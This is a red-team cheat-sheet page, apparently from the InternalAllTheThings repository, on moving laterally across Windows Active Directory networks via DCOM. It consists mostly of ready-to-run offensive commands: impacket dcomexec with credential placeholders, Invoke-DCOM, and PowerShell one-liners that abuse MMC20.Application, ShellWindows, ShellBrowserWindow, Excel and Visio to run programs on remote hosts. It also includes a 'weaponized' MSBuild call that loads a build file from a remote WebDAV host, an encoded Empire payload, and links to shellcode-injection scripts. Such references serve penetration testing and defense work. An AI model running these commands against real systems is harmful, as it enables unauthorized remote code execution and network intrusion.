internal-dcom.md (6287B)
1 --- 2 title: "Internal - DCOM" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/internal-dcom.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/internal-dcom.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Internal - DCOM 12 13 > DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer. 14 15 * [impacket/dcomexec.py](https://github.com/fortra/impacket/blob/master/examples/dcomexec.py) 16 17 ```ps1 18 dcomexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-debug] [-codec CODEC] [-object [{ShellWindows,ShellBrowserWindow,MMC20}]] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB] target [command ...] 19 dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 20 dcomexec.py -share C$ -object MMC20 '<DOMAIN>/<USERNAME>:<PASSWORD>@<MACHINE_CIBLE>' 'ipconfig' 21 22 python3 dcomexec.py -object MMC20 -silentcommand -debug $DOMAIN/$USER:$PASSWORD\$@$HOST 'notepad.exe' 23 # -object MMC20 specifies that we wish to instantiate the MMC20.Application object. 24 # -silentcommand executes the command without attempting to retrieve the output. 25 ``` 26 27 * [klezVirus/CheeseTools](https://github.com/klezVirus/CheeseTools) 28 29 ```powershell 30 # https://klezvirus.github.io/RedTeaming/LateralMovement/LateralMovementDCOM/ 31 -t, --target=VALUE Target Machine 32 -b, --binary=VALUE Binary: powershell.exe 33 -a, --args=VALUE Arguments: -enc <blah> 34 -m, --method=VALUE Methods: MMC20Application, ShellWindows, 35 ShellBrowserWindow, ExcelDDE, VisioAddonEx, 36 OutlookShellEx, ExcelXLL, VisioExecLine, 37 OfficeMacro 38 -r, --reg, --registry Enable registry manipulation 39 -h, -?, --help Show Help 40 41 Current Methods: MMC20.Application, ShellWindows, ShellBrowserWindow, ExcelDDE, VisioAddonEx, OutlookShellEx, ExcelXLL, VisioExecLine, OfficeMacro. 42 ``` 43 44 * [rvrsh3ll/Misc-Powershell-Scripts/Invoke-DCOM.ps1](https://raw.githubusercontent.com/rvrsh3ll/Misc-Powershell-Scripts/master/Invoke-DCOM.ps1) 45 46 ```powershell 47 Import-Module .\Invoke-DCOM.ps1 48 Invoke-DCOM -ComputerName '10.10.10.10' -Method MMC20.Application -Command "calc.exe" 49 Invoke-DCOM -ComputerName '10.10.10.10' -Method ExcelDDE -Command "calc.exe" 50 Invoke-DCOM -ComputerName '10.10.10.10' -Method ServiceStart "MyService" 51 Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellBrowserWindow -Command "calc.exe" 52 Invoke-DCOM -ComputerName '10.10.10.10' -Method ShellWindows -Command "calc.exe" 53 ``` 54 55 ## DCOM via MMC Application Class 56 57 This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. 58 59 ```ps1 60 PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) 61 PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) 62 PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") 63 64 # Weaponized example with MSBuild 65 PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") 66 ``` 67 68 [n0tty/powershellery/Invoke-MMC20RCE.ps1](https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1) 69 70 ## DCOM via Office 71 72 * Excel.Application 73 * DDEInitiate 74 * RegisterXLL 75 * Outlook.Application 76 * CreateObject->Shell.Application->ShellExecute 77 * CreateObject->ScriptControl (office-32bit only) 78 * Visio.InvisibleApp (same as Visio.Application, but should not show the Visio window) 79 * Addons 80 * ExecuteLine 81 * Word.Application 82 * RunAutoMacro 83 84 ```ps1 85 # Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM 86 Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 87 Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a 88 89 # Using Excel DDE 90 PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) 91 PS C:\> $excel.DisplayAlerts = $false 92 PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") 93 94 # Using Excel RegisterXLL 95 # Can't be used reliably with a remote target 96 Require: reg add HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Security\Trusted Locations /v AllowsNetworkLocations /t REG_DWORD /d 1 97 PS> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) 98 PS> $excel.RegisterXLL("EvilXLL.dll") 99 100 # Using Visio 101 $visio = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.InvisibleApp", "$ComputerName")) 102 $visio.Addons.Add("C:\Windows\System32\cmd.exe").Run("/c calc") 103 ``` 104 105 ## DCOM via ShellExecute 106 107 ```ps1 108 $com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") 109 $obj = [System.Activator]::CreateInstance($com) 110 $item = $obj.Item() 111 $item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) 112 ``` 113 114 ## DCOM via ShellBrowserWindow 115 116 :warning: Windows 10 only, the object doesn't exists in Windows 7 117 118 ```ps1 119 $com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") 120 $obj = [System.Activator]::CreateInstance($com) 121 $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) 122 ``` 123 124 ## References 125 126 * [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) 127 * [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - January 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) 128 * [Non-administrative DCOM Execution: Exploring BloodHound's ExecuteDCOM - simondotsh - December 29, 2021](https://simondotsh.com/infosec/2021/12/29/dcom-without-admin.html)